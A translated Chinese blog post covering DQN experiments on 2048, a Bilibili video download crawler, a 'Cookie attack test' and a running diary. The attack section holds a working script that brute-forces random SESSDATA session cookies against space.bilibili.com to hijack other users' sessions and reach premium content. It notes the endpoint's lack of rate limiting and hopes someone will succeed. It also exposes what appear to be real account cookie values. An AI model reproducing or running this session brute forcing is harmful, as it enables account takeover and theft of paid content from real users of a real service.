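    [0, 0, 0, 0],
    [0, 0, 0, 2048],
]
features = encode_state_action(tiles, 'D')  # 16 board values followed by 4 action values
```

Note that TestModel applies two nn.Linear layers with no activation in between, so its output is an affine function of this vector. Inserting a nonlinearity such as ReLU between the layers would be one way to give it more capacity, though that is a suggestion and not part of the original experiment.
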

Three points are worth noting:

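  1. At first I wondered whether the model could take only the current state (the board) as input and output a probability distribution over actions (via a softmax activation), which would make the action input unnecessary. That idea cannot be realized with DQN as such, because a softmax distribution over actions is a policy rather than a $Q$ function (the network in the referenced paper does take only the state as input, but it outputs one $Q$ value per action rather than probabilities). More importantly, if the action space is very large (in 2048 it is tiny, only 4 actions), the model output becomes extremely complex, and in many games the number of legal actions varies by state (in Go, for instance, the action space shrinks as the game goes on), which makes DQN even harder to apply. There are of course algorithms that output actions directly, namely Policy Network, which this post does not discuss.
  2. Algorithmically, DQN has an obvious weakness: it must repeatedly find the action that maximizes the $Q$ function, and when there are many actions this search is expensive.
  3. Because the original author's scoring strategy is so good that it already serves as a usable $Q$ function, the original game can be used directly to generate plenty of episode data as the memory $\mathcal{D}$ for training. The code is shown in generate_episode.py: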
  • generate_episode.py \text{generate\_episode.py} generate_episode.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import time
import pygame
import pandas as pd

from pygame.locals import (QUIT,
                           KEYDOWN,
                           K_ESCAPE,
                           K_LEFT,
                           K_RIGHT,
                           K_DOWN,
                           K_UP,
                           K_w,
                           K_a,
                           K_s,
                           K_d,
                           K_k,
                           K_l,
                           MOUSEBUTTONDOWN)

from config import GameConfig

from src.utils import load_args, save_args, draw_text
from src.game import Game, Button
from src.ai import AI


def run(args, episode_path=None):
    interval = args.interval
    state = 'start'
    # clock = pygame.time.Clock()
    game = Game(args.grid_dim)
    ai = AI(args)
    next_direction = ''
    last_time = time.time()

    buttons = [
        Button('start', 'Restart', (args.grid_size + 50, 150)),
        Button('ai', 'Autorun', (args.grid_size + 50, 250)),
    ]

    episode_dict = {
        'action': [],
        'tiles': [],
        'score': [],
        'reward': [],
    }

    while not state == 'exit':
        if game.state in ['over', 'win']:
            state = game.state

        # Start game
        if state == 'start':
            game.start()
            state = 'ai'

        if state == 'ai' and next_direction == '':
            next_direction, reward = ai.get_next(game.grid.tiles, random_strategy=args.random_strategy)
            current_direction = next_direction

            # Logging Episode
            tiles = []
            for y in range(args.grid_dim):
                for x in range(args.grid_dim):
                    tiles.append(game.grid.tiles[y][x])
            episode_dict['tiles'].append(tuple(tiles))
            episode_dict['action'].append(current_direction)
            episode_dict['score'].append(game.score)
            episode_dict['reward'].append(reward)

        # Direction
        if next_direction and (state == 'run' or state == 'ai' and time.time() - last_time > interval):
            game.run(next_direction)
            next_direction = ''
            # last_time = time.time()
        if state == 'over':
            break

        elif state == 'win':
            break

    df = pd.DataFrame(episode_dict, columns=list(episode_dict.keys()))
    if episode_path is not None:
        df.to_csv(episode_path, index=False, header=True, sep='\t')
    return df

if __name__ == '__main__':

    N = 10000
    args = load_args(GameConfig)

    # dfs = []
    # args.random_strategy = True
    # for i in range(N):
    #     print(i)
    #     df = run(args, None)
    #     df['episode'] = i
    #     dfs.append(df)
    # pd.concat(dfs).to_csv('episode/random.csv', sep='\t', header=True, index=False)
    #

    args.random_strategy = False
    N = 2000
    for i in range(1732, N):
        print(i)
        df = run(args, 'episode/ai_%04d.csv' % (i))
        # df.loc[:, 'episode'] = i
        # dfs.append(df)
    # pd.concat(dfs).to_csv('episode/random.csv', sep='\t', header=True, index=False)

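In my view, the hard part of DQN is how to encode states and actions for complex games. Perhaps my understanding is still too shallow; when I have time I really must study GitHub@Deep-Reinforcement-Learning-Algorithms-with-PyTorch properly.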
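As a rough illustration of how the logged episodes could feed a replay memory, the sketch below turns one tab-separated episode file (columns `action`, `tiles`, `score`, `reward`, as written by generate_episode.py) into (state, action, reward, next_state, done) tuples. The function name `episode_to_transitions`, the handling of the terminal step, and the assumption that `reward` is numeric are mine, not part of the original code; the sample uses a shortened 4-tile board for brevity.

```python
import ast
import csv
import io
from typing import List, Tuple

Transition = Tuple[tuple, str, float, tuple, bool]


def episode_to_transitions(tsv_text: str) -> List[Transition]:
    """Turn one logged episode into (state, action, reward, next_state, done) tuples."""
    rows = list(csv.DictReader(io.StringIO(tsv_text), delimiter='\t'))
    transitions = []
    for index, row in enumerate(rows):
        # The tiles tuple was written as its string form, e.g. "(2, 0, 0, 2)".
        state = ast.literal_eval(row['tiles'])
        done = index == len(rows) - 1
        # Assumption: the terminal step has no logged successor, so reuse the state.
        next_state = state if done else ast.literal_eval(rows[index + 1]['tiles'])
        transitions.append((state, row['action'], float(row['reward']), next_state, done))
    return transitions


if __name__ == '__main__':
    sample = (
        'action\ttiles\tscore\treward\n'
        'L\t(2, 0, 0, 2)\t0\t1.5\n'
        'U\t(4, 0, 0, 2)\t4\t0.5\n'
    )
    for transition in episode_to_transitions(sample):
        print(transition)
```

Reading a real file only requires passing its contents, for example `open(path, encoding='utf8').read()`, to the function.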


Part 2: Bilibili Video Crawling and Cookie Attack Test

(1) Bilibili video download script

This script may be of interest to some readers:

# -*- coding: utf-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import re
import json
import requests
from tqdm import tqdm

class BiliBiliCrawler(object):
	
	def __init__(self) -> None:				
		self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0'
		self.video_webpage_link = 'https://www.bilibili.com/video/{}'.format
		self.video_detail_api = 'https://api.bilibili.com/x/player/pagelist?bvid={}&jsonp=jsonp'.format						
		self.video_playurl_api = 'https://api.bilibili.com/x/player/playurl?cid={}&bvid={}&qn=64&type=&otype=json'.format	
		self.episode_playurl_api = 'https://api.bilibili.com/pgc/player/web/playurl?ep_id={}&jsonp=jsonp'.format			
		self.episode_webpage_link = 'https://www.bilibili.com/bangumi/play/ep{}'.format
		self.anime_webpage_link = 'https://www.bilibili.com/bangumi/play/ss{}'.format
		self.chunk_size = 1024
		self.regexs = {
			'host': r'https://(.*\.com)',
			'episode_name': r'meta name="keywords" content="(.*?)"',
			'initial_state': r'<script>window.__INITIAL_STATE__=(.*?);',
			'playinfo': r'<script>window.*?__playinfo__=(.*?)</script>',	
		}

	def easy_download_video(self, bvid, save_path=None) -> bool:
		"""Tricky method with available api"""
		
		# Request for detail information of video
		response = requests.get(self.video_detail_api(bvid), headers={'User-Agent': self.user_agent})
		json_response = response.json()
		
		cid = json_response['data'][0]['cid']
		video_title = json_response['data'][0]['part']
		if save_path is None:
			save_path = f'{video_title}.mp4'		

		print(f'Video title: {video_title}')
		
		# Request for playurl and size of video
		response = requests.get(self.video_playurl_api(cid, bvid), headers={'User-Agent': self.user_agent})
		json_response = response.json()
		video_playurl = json_response['data']['durl'][0]['url']
		# video_playurl = json_response['data']['durl'][0]['backup_url'][0]
		video_size = json_response['data']['durl'][0]['size']
		total = video_size // self.chunk_size

		print(f'Video size: {video_size}')
		
		# Download video
		headers = {
			'User-Agent': self.user_agent,
			'Origin'	: 'https://www.bilibili.com',
			'Referer'	: 'https://www.bilibili.com',			
		}
		headers['Host'] = re.findall(self.regexs['host'], video_playurl, re.I)[0]
		headers['Range'] = f'bytes=0-{video_size}'
		response = requests.get(video_playurl, headers=headers, stream=True, verify=False)
		tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download process', total=total)
		with open(save_path, 'wb') as f:
			for byte in tqdm_bar:
				f.write(byte)
		return True

	def easy_download_episode(self, epid, save_path=None) -> bool:
		"""Tricky method with available api"""
		
		# Request for playurl and size of episode
		response = requests.get(self.episode_playurl_api(epid))
		json_response = response.json()
		# episode_playurl = json_response['result']['durl'][0]['url']
		episode_playurl = json_response['result']['durl'][0]['backup_url'][0]
		episode_size = json_response['result']['durl'][0]['size']
		total = episode_size // self.chunk_size

		print(f'Episode size: {episode_size}')
		
		# Download episode
		headers = {
			'User-Agent': self.user_agent,
			'Origin'	: 'https://www.bilibili.com',
			'Referer'	: 'https://www.bilibili.com',			
		}
		headers['Host'] = re.findall(self.regexs['host'], episode_playurl, re.I)[0]
		headers['Range'] = f'bytes=0-{episode_size}'
		response = requests.get(episode_playurl, headers=headers, stream=True, verify=False)
		tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download process', total=total)
		if save_path is None:
			save_path = f'ep{epid}.mp4'
		with open(save_path, 'wb') as f:
			for byte in tqdm_bar:
				f.write(byte)
		return True

	def download(self, bvid, video_save_path=None, audio_save_path=None) -> dict:
		"""General method by parsing page source"""
		
		if video_save_path is None:
			video_save_path = f'{bvid}.m4s'
		if audio_save_path is None:
			audio_save_path = f'{bvid}.mp3'
		
		common_headers = {
			'Accept'			: '*/*',
			'Accept-encoding'	: 'gzip, deflate, br',
			'Accept-language'	: 'zh-CN,zh;q=0.9,en;q=0.8',
			'Cache-Control'		: 'no-cache',
			'Origin'			: 'https://www.bilibili.com',
			'Pragma'			: 'no-cache',
			'Host'				: 'www.bilibili.com',
			'User-Agent'		: self.user_agent,
		}

		# In fact we only need bvid
		# Each episode of an anime also has a bvid and a corresponding bvid-URL which is redirected to another episode link
		# e.g. https://www.bilibili.com/video/BV1rK4y1b7TZ is redirected to https://www.bilibili.com/bangumi/play/ep322903
		response = requests.get(self.video_webpage_link(bvid), headers=common_headers)
		html = response.text
		playinfos = re.findall(self.regexs['playinfo'], html, re.S)
		if not playinfos:
			raise Exception(f'No playinfo found in bvid {bvid}\nPerhaps VIP required')
		playinfo = json.loads(playinfos[0])
		
		# There exists four different URLs with observations as below
		# `baseUrl` is the same as `base_url` with string value
		# `backupUrl` is the same as `backup_url` with array value
		# Here hard code is employed to select playurl
		def _select_video_playurl(_videoinfo):
			if 'backupUrl' in _videoinfo:
				return _videoinfo['backupUrl'][-1]
			if 'backup_url' in _videoinfo:
				return _videoinfo['backup_url'][-1]
			if 'baseUrl' in _videoinfo:
				return _videoinfo['baseUrl']
			if 'base_url' in _videoinfo:
				return _videoinfo['base_url']	
			raise Exception(f'No video URL found\n{_videoinfo}')	
			
		def _select_audio_playurl(_audioinfo):
			if 'backupUrl' in _audioinfo:
				return _audioinfo['backupUrl'][-1]
			if 'backup_url' in _audioinfo:
				return _audioinfo['backup_url'][-1]
			if 'baseUrl' in _audioinfo:
				return _audioinfo['baseUrl']
			if 'base_url' in _audioinfo:
				return _audioinfo['base_url']
			raise Exception(f'No audio URL found\n{_audioinfo}')
		
		# with open(f'playinfo-{bvid}.js', 'w') as f:
			# json.dump(playinfo, f)

		if 'durl' in playinfo['data']:
			video_playurl = playinfo['data']['durl'][0]['url']
			# video_playurl = playinfo['data']['durl'][0]['backup_url'][1]
			print(video_playurl)
			video_size = playinfo['data']['durl'][0]['size']
			total = video_size // self.chunk_size
			print(f'Video size: {video_size}')
			headers = {
				'User-Agent': self.user_agent,
				'Origin'	: 'https://www.bilibili.com',
				'Referer'	: 'https://www.bilibili.com',			
			}
			headers['Host'] = re.findall(self.regexs['host'], video_playurl, re.I)[0]
			headers['Range'] = f'bytes=0-{video_size}'
			# headers['Range'] = f'bytes={video_size + 1}-{video_size + video_size + 1}'
			response = requests.get(video_playurl, headers=headers, stream=True, verify=False)
			tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download process', total=total)
			with open(video_save_path, 'wb') as f:
				for byte in tqdm_bar:
					f.write(byte)
			return True

		elif 'dash' in playinfo['data']:
			videoinfo = playinfo['data']['dash']['video'][0]
			audioinfo = playinfo['data']['dash']['audio'][0]
			video_playurl = _select_video_playurl(videoinfo)
			audio_playurl = _select_audio_playurl(audioinfo)

		else:
			raise Exception(f'No data found in playinfo\n{playinfo}')

		# First make a fake request to get the `Content-Range` params in response headers
		fake_headers = {
			'Accept'			: '*/*',
			'Accept-Encoding'	: 'identity',
			'Accept-Language'	: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
			'Accept-Encoding'	: 'gzip, deflate, br',
			'Cache-Control'		: 'no-cache',
			'Origin'			: 'https://www.bilibili.com',
			'Pragma'			: 'no-cache',
			'Range'				: 'bytes=0-299',
			'Referer'			: self.video_webpage_link(bvid),
			'User-Agent'		: self.user_agent,
			'Connection'		: 'keep-alive',
		}
		response = requests.get(video_playurl, headers=fake_headers, stream=True)
		video_size = int(response.headers['Content-Range'].split('/')[-1])
		total = video_size // self.chunk_size
		
		# Next make a real request to download full video
		real_headers = {
			'Accept'			: '*/*',
			'accept-encoding'	: 'identity',
			'Accept-Language'	: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
			'Accept-Encoding'	: 'gzip, deflate, br',
			'cache-control'		: 'no-cache',
			'Origin'			: 'https://www.bilibili.com',
			'pragma'			: 'no-cache',
			'Range'				: f'bytes=0-{video_size}',
			'Referer'			: self.video_webpage_link(bvid),
			'User-Agent'		: self.user_agent,
			'Connection'		: 'keep-alive',
		}
		response = requests.get(video_playurl, headers=real_headers, stream=True)
		tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc='Download video', total=total)
		with open(video_save_path, 'wb') as f:
			for byte in tqdm_bar:
				f.write(byte)
				
		# The same way for downloading audio
		response = requests.get(audio_playurl, headers=fake_headers, stream=True)
		audio_size = int(response.headers['Content-Range'].split('/')[-1])
		total = audio_size // self.chunk_size // 2
		
		# Confusingly downloading full audio at one time is forbidden
		# We have to download audio in two parts
		with open(audio_save_path, 'wb') as f:
			audio_part = 0
			for (_from, _to) in [[0, audio_size // 2], [audio_size // 2 + 1, audio_size]]:
				headers = {
					'Accept': '*/*',
					'Accept-Encoding': 'identity',
					'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
					'Accept-Encoding': 'gzip, deflate, br',
					'Cache-Control': 'no-cache',
					'Origin': 'https://www.bilibili.com',
					'Pragma': 'no-cache',
					'Range': f'bytes={_from}-{_to}',
					'Referer': self.video_webpage_link(bvid),
					'User-Agent': self.user_agent,
					'Connection': 'keep-alive',
				}
				audio_part += 1
				response = requests.get(audio_playurl, headers=headers, stream=True)
				tqdm_bar = tqdm(response.iter_content(self.chunk_size), desc=f'Download audio part{audio_part}', total=total)
				for byte in tqdm_bar:
					f.write(byte)
		return True

	def easy_download(self, url) -> bool:
		"""
		Download with page URL as below:
		>>> url = 'https://www.bilibili.com/video/BV1jf4y1h73r'
		>>> url = 'https://www.bilibili.com/bangumi/play/ep399420'
		"""

		headers = {
			'Accept': '*/*',
			'Accept-Encoding': 'gzip, deflate, br',
			'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
			'Cache-Control': 'no-cache',
			'Origin': 'https://www.bilibili.com',
			'Pragma': 'no-cache',
			'Host': 'www.bilibili.com',
			'User-Agent': self.user_agent,
		}		
		response = requests.get(url, headers=headers)
		html = response.text
		initial_states = re.findall(self.regexs['initial_state'], html, re.S)
		if not initial_states:
			raise Exception('No initial states found in page source')
		initial_state = json.loads(initial_states[0])
		
		# Download anime with several episodes
		episode_list = initial_state.get('epList')
		if episode_list is not None:
			name = re.findall(self.regexs['episode_name'], html, re.S)[0].strip()
			for episode in episode_list:
				if episode['badge'] != '会员':							 # No VIP required
					if not os.path.exists(name):
						os.mkdir(name)
					self.download(
						bvid=str(episode['bvid']),
						video_save_path=os.path.join(name, episode['titleFormat'] + episode['longTitle'] + '.m4s'),
						audio_save_path=os.path.join(name, episode['titleFormat'] + episode['longTitle'] + '.mp3'),
					)
				else:													 # Unable to download VIP anime
					continue
		
		# Download common videos
		else:
			video_data = initial_state['videoData']
			name = video_data['tname'].strip()
			if not os.path.exists(name):
				os.mkdir(name)
			self.download(
				# `episode` is undefined in this branch; this assumes `videoData` carries the `bvid` field
				bvid=str(video_data['bvid']),
				video_save_path=os.path.join(name, video_data['title'] + '.m4s'),
				audio_save_path=os.path.join(name, video_data['title'] + '.mp3'),
			)
		return True

if __name__ == '__main__':
	
	bb = BiliBiliCrawler()
	
	# bb.easy_download_video('BV14T4y1u7ST', 'temp/BV14T4y1u7ST.mp4')
	# bb.easy_download_video('BV1z5411W7tX', 'temp/BV1z5411W7tX.mp4')
	
	# bb.easy_download_episode('199933', 'temp/ep199933.mp4')
	# bb.easy_download_episode('321808', 'temp/ep321808.mp4')
	
	# bb.download('BV1PT4y137CA')
	# bb.download('BV14T4y1u7ST')
	
	# bb.easy_download('https://www.bilibili.com/video/BV1jf4y1h73r')
	# bb.easy_download('https://www.bilibili.com/bangumi/play/ep399420')
	# bb.easy_download('https://www.bilibili.com/bangumi/play/ss12548/')

In addition, create 4 empty folders in the directory that contains this script: temp, logging, video, audio
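The folders can also be created from Python before running the crawler. A minimal sketch, where the helper name `ensure_directories` is hypothetical and the demo writes into a temporary directory rather than the script directory:

```python
import os
import tempfile


def ensure_directories(root: str, names=('temp', 'logging', 'video', 'audio')) -> list:
    """Create the working folders under `root` if they do not exist yet."""
    paths = [os.path.join(root, name) for name in names]
    for path in paths:
        os.makedirs(path, exist_ok=True)  # no error if the folder already exists
    return paths


if __name__ == '__main__':
    with tempfile.TemporaryDirectory() as root:
        for path in ensure_directories(root):
            print(path, os.path.isdir(path))
```

Calling `ensure_directories('.')` from the script directory would create the four folders next to the crawler.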

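The commented-out lines at the end of the code above test the different crawling methods of the BiliBiliCrawler class. I will not go through the crawling approach in detail; crawling is largely a matter of practice. The key points are:

  1. easy_download_video: downloads directly by the BV number of the video, and the result is an .mp4 file with audio and video already merged. This method needs no analysis of the page source; all the information comes from interfaces provided by Bilibili. The most important one is self.video_playurl_api, which returns the video source link and the video size. Catching this request takes a bit of luck; I suggest watching the XHR traffic in the browser developer tools so that it is not missed. Downloading the video then only requires adding a Range header to the request whose value covers the byte range of the video (bytes=0-{video_size} in the script).

  2. easy_download_episode: downloads a bangumi episode; the approach is basically the same as easy_download_video. The argument is the ep number of the episode. In case it is unclear where to find it: https://www.bilibili.com/bangumi/play/ep250984 is 《风灵玉秀》 and its ep number is 250984 (I strongly recommend 《风灵玉秀》; Chinese animation has finally started doing yuri, and at the very least it is a comfortable watch). The weakness of this method is that it downloads a single episode only; to download a whole series, use the last method. The result is also an .mp4 file with audio and video merged.

  3. download: this one is interesting. Every video on Bilibili currently has a BV number, bangumi episodes included. For example, visiting www.bilibili.com/video/BV1PT4y137CA redirects automatically to 《名侦探柯南》, so it is possible to write a single method that downloads anything from a BV number alone. Its logic differs from the two methods above, because it works by parsing the page source:

    • Pick any video with a BV link, view the page source and search for playinfo; you will see information like the following (video link https://www.bilibili.com/video/BV1nx411F7Jf, a masterpiece AMD that I strongly recommend):
      Figure 2
    • Everything needed can then be found in this piece of source. The video source is in backupUrl, backup_url, baseUrl and base_url; the links in all four can be used for downloading. I suggest taking the first of these, backupUrl, which seems somewhat more stable.
  4. easy_download is essentially an extension of download: given the page URL of any video, it downloads it. Note that if you give it a bangumi link, it can download every episode of the series, so this is the recommended method. The drawback is that the downloaded video is still separate from the audio.

    One further detail: the audio cannot be downloaded in a single request; it has to be downloaded in two segments.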
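The page-parsing and Range logic described in the points above can be tried offline with the sketch below. It reuses the playinfo regular expression from the crawler, mirrors its URL preference order, reads the total size from a `Content-Range` value, and splits a download into inclusive byte ranges. The helper names, the made-up HTML snippet and the example.com URLs are assumptions for illustration only; no request is sent.

```python
import json
import re
from typing import List, Tuple

# Same regular expression as the 'playinfo' entry in the crawler.
PLAYINFO_PATTERN = r'<script>window.*?__playinfo__=(.*?)</script>'


def extract_playinfo(html: str) -> dict:
    """Pull the JSON assigned to window.__playinfo__ out of the page source."""
    matches = re.findall(PLAYINFO_PATTERN, html, re.S)
    if not matches:
        raise ValueError('no playinfo found in page source')
    return json.loads(matches[0])


def select_playurl(info: dict) -> str:
    """Mirror the crawler's preference: last backup URL first, then the base URL."""
    for key in ('backupUrl', 'backup_url'):
        if info.get(key):
            return info[key][-1]
    for key in ('baseUrl', 'base_url'):
        if info.get(key):
            return info[key]
    raise KeyError('no playable URL in this entry')


def parse_total_size(content_range: str) -> int:
    """Read the total size from a value such as 'bytes 0-299/123456'."""
    return int(content_range.split('/')[-1])


def split_ranges(total_size: int, parts: int) -> List[Tuple[int, int]]:
    """Return at most `parts` inclusive ranges covering bytes 0..total_size-1 once."""
    step = -(-total_size // parts)  # ceiling division; assumes total_size > 0
    return [(start, min(start + step, total_size) - 1)
            for start in range(0, total_size, step)]


if __name__ == '__main__':
    html = ('<html><script>window.__playinfo__={"data": {"dash": {"video": [{'
            '"baseUrl": "https://example.com/v.m4s", '
            '"backupUrl": ["https://example.com/b1.m4s", "https://example.com/b2.m4s"]'
            '}]}}}</script></html>')
    video = extract_playinfo(html)['data']['dash']['video'][0]
    print(select_playurl(video))
    size = parse_total_size('bytes 0-299/1001')
    for start, end in split_ranges(size, 2):
        print(f'Range: bytes={start}-{end}')
```

Because Range bounds are inclusive, the last byte of a file of size n has index n - 1; a request that asks for one byte more is normally just clamped by the server.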

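(2) Bilibili Cookie attack test

One might ask: what about premium-member content? This question interests me a great deal too. After some digging, the key turned out to be the SESSDATA field in the Cookie.

How was this discovered? Regular Bilibili users will be familiar with user comments like this one:

The most handsome person on Bilibili 👉https://space.bilibili.com/

Clicking through lands on your own account. The link obviously contains no field related to your identity, so what leads you to your own account is most likely the Cookie. A quick look at the captured traffic shows Cookie content like this:
After some thought I decided to mask my own Cookie in the screenshot. Evidently, a request that carries this Cookie should reach the personal home page; otherwise it is redirected to the login page (if you are not logged in, visiting https://space.bilibili.com/ redirects automatically to the login page).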

# -*- coding: utf-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import requests
from bs4 import BeautifulSoup

def _cookie_to_string(_cookies):
	string = ''
	for key, value in _cookies.items():
		string += '{}={}; '.format(key, value)
	return string.strip()

cookies = {
	"_uuid": "734643A3-58D0-49AD-7C14-D354884C516738397infoc",
	"bili_jct": "d57a576f60b82220175d3ffc571edbef",
	"buvid_fp": "A0FE0996-3A5D-4E2A-A4B0-AE327ACD7B9A148826infoc",
	"buvid_fp_plain": "9ECE9F3E-FE9A-4827-A49D-C1AB0E94F854167644infoc",
	"buvid3": "F2EB0177-2BDF-4BA9-9A87-6A399AC553E4167627infoc",
	"DedeUserID": "130321232",
	"DedeUserID__ckMd5": "42d02c72aa29553d",
	"fingerprint": "9307d54681dc236c513a4b0f96bf8388",
	"innersign": "0",
	"PVID": "1",
	"SESSDATA": "",
	"sid": "7nffa1lf"
}

headers = {
	'Connection': 'keep-alive',
	'Cookie': _cookie_to_string(cookies),
	'Host': 'space.bilibili.com',
	'TE': 'trailers',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0'
}

r = requests.get('https://space.bilibili.com', headers=headers)
html = r.text
soup = BeautifulSoup(html, 'lxml')
print(soup.find('title').string)

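Running the code above should print my account name.

What, you did not see it? That is expected, because I quietly removed the value of SESSDATA. Furthermore, I can tell you definitively that if you keep only SESSDATA and delete the other 11 fields, my account name is still printed. You can try this with your own account.

So SESSDATA alone is sufficient, and without SESSDATA nothing works, which means that SESSDATA is the whole of the verification. A value generated at random in the format of SESSDATA looks roughly like this: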

dcb500d8,1644888158,520eb*81

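The 1644888158 in the middle of this SESSDATA is evidently a timestamp. Further packet capture shows that it is the expiry time of SESSDATA, that is, of the Cookie, roughly 180 days after login. In my trials the last three characters were almost always *81, so the random part is confined to the remaining 13 hexadecimal characters, which gives only $16^{13} = 2^{52} \approx 4.5\times10^{15}$ possibilities. In theory, then, if I fix a timestamp and enumerate every possibility, and if someone logged in at that timestamp, visiting https://space.bilibili.com would reach that person's home page. If that person is a premium member, adding the SESSDATA to the Cookie would be enough to download the paid content.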
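As a sanity check on the numbers in this paragraph, the short calculation below decodes the timestamp and counts the combinations for 13 free hexadecimal characters (8 before the timestamp and 5 after it). The request rate used for the time estimate is a purely hypothetical figure chosen for illustration, and the helper name `years_to_enumerate` is mine.

```python
from datetime import datetime, timezone

FREE_HEX_CHARACTERS = 13  # 8 leading + 5 trailing hexadecimal characters
search_space = 16 ** FREE_HEX_CHARACTERS


def years_to_enumerate(space: int, requests_per_second: float) -> float:
    """Time needed to try every candidate once at a fixed request rate."""
    seconds = space / requests_per_second
    return seconds / (365 * 24 * 3600)


# The middle field of the sample value, interpreted as a Unix timestamp in UTC.
expiry = datetime.fromtimestamp(1644888158, tz=timezone.utc)

if __name__ == '__main__':
    print(search_space == 2 ** 52)
    print(expiry.isoformat())
    # Hypothetical rate of 1000 requests per second.
    print(round(years_to_enumerate(search_space, 1000.0)))
```

Even at that optimistic rate, walking through the whole space would take on the order of a hundred thousand years, which is consistent with an exhaustive search being out of reach for a single machine.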

So the idea is to generate at random a SESSDATA of the form dcb500d8,1644888158,520eb*81 and use it to visit https://space.bilibili.com. A simple attack script is as follows:

  • proxy.py
# -*- coding: utf-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import sys
import time
import random
import requests
from bs4 import BeautifulSoup
from multiprocessing import Process, Pool, Queue

from pprint import pprint

def cookie_to_string(cookies: dict) -> str:
	string = ''
	for key, value in cookies.items():
		string += '{}={}; '.format(key, value)
	return string.strip()


def random_sessdata():
	chars = ['a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
	nums = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
	return f'{"".join([random.choice(chars) for _ in range(8)])},1644888158,{"".join([random.choice(chars) for _ in range(5)])}*81'


def easy_requests(url: str, headers: dict, proxies: dict) -> str:
	try:
		if proxies is None:
			response = requests.get(url, headers=headers, timeout=30)
		else:
			response = requests.get(url, headers=headers, proxies=proxies, timeout=30)
		html = response.text
		soup = BeautifulSoup(html, 'lxml')
		try: 
			title = str(soup.find('title').string).encode('ISO-8859-1').decode('utf8')
		except:
			title = str(soup.find('title').string)
		return title, 0, time.strftime('%Y-%m-%d %H:%M:%S')
	except Exception as e: 
		return e, 1, time.strftime('%Y-%m-%d %H:%M:%S')

def _attack(url: str, queue: Queue, pid: str) -> None:
	if queue is None:
		while True:
			cookies = {
				'SESSDATA': random_sessdata(),
			}
			headers = {
				'Connection': 'keep-alive',
				'Cookie': cookie_to_string(cookies),
				'Host': 'space.bilibili.com',
				'TE': 'trailers',
				'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24',
			}	
			response, flag, timestamp = easy_requests(url, headers, proxies=None)
			with open(f'logging/{pid}.txt', 'a', encoding='utf8') as f:
				f.write(f'{timestamp}\t{cookies["SESSDATA"]}\t{headers["User-Agent"]}\tNone\t{response}\n')	
	else:
		proxy = queue.get()
		while True:
			proxies = {'https': 'https://{}'.format(proxy)}
			cookies = {
				'SESSDATA': random_sessdata(),
			}
			headers = {
				'Connection': 'keep-alive',
				'Cookie': cookie_to_string(cookies),
				'Host': 'space.bilibili.com',
				'TE': 'trailers',
				'User-Agent': generate_user_agent('../user_agent_list.txt'),
			}
			response, flag, timestamp = easy_requests(url, headers, proxies)
			if flag: 
				proxy = queue.get()
			with open(f'logging/{pid}.txt', 'a', encoding='utf8') as f:
				f.write(f'{timestamp}\t{cookies["SESSDATA"]}\t{headers["User-Agent"]}\t{proxy}\t{response}\n')

def attack(target_url = 'https://space.bilibili.com') -> None:
	processes = []
	params = {
		'url': target_url,
		'queue': None,
		'pid': str(1).zfill(3),
	}
	with open(f'logging/{params["pid"]}.txt', 'w', encoding='utf8') as f:
		pass	
	processes.append(Process(target=_attack, kwargs=params))

	for process in processes:
		process.start()
	for process in processes:
		process.join()

	time.sleep(1000)
	for process in processes:
		process.terminate()

if __name__ == '__main__':
	attack()

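Unfortunately, a search space of this size is still far too large for a personal computer. After more than ten days of running, the script never hit a valid SESSDATA, not even my own. The good news is that this interface basically does not ban IPs: every so often I checked whether my own SESSDATA still worked, and it always did, so Bilibili seems to leave this interface completely undefended. Sooner or later someone determined will get through the whole space. Surely I cannot be the only person who logged in at that timestamp; that would be far too lonely.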


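Postscript

The happiest thing this summer was that, after my mother rode her bike alongside me on a road run, her attitude toward my running changed a great deal. She used to have nothing to say about it and thought running had left me dark and skinny, like a monkey. Perhaps this time she was truly moved.

I have signed up for two half marathons so far. One is the marathon held in Zhoushan, Zhejiang on November 21. It needs no lottery; registration opened at 10 this morning and I got a place. The other is the 喜临门 Shaoxing Marathon, which I entered a few days ago and which does use a lottery. I think the odds are low, and lower still for a first-timer, so I simply grabbed the Zhoushan place. If I am drawn for Shaoxing as well, I will decide then: if I am in good shape I can run both, and if not I will treat it as paying for a lesson.

On the 10th I took the train to Zhenjiang South and was finally back at school. Seeing the refurbished track, I went straight there with my suitcase before even going to the dormitory and ran a lap, which felt wonderful. That evening I timed a 4 km at 17 minutes 30 seconds, barely at my April to May level, but my endurance has inevitably dropped: I went two whole months without running more than 10 km, and now I cannot even hold out for 10 km. I am not too worried, though, because it was much the same at the start of last semester and I was back at my peak within about half a month. Tonight I went out in the typhoon and ran 3 km. The thrill of splashing through puddles is back, with shoes, clothes and hair all soaked through. Utterly exhilarating.

I am glad that last semester's grades finally came out before term started: of six major courses, four at 4.0 and two at 3.7. The turmoil in April and May left me with no mind for study, and I thought there was no hope. At first I wanted to compete with 刘天浩 on grades, then I grew more and more laid-back about it; fortunately the result is not bad. Also, since term started I have found my own first-author paper on Baidu Scholar, so I am finally no longer a zero-output good-for-nothing.

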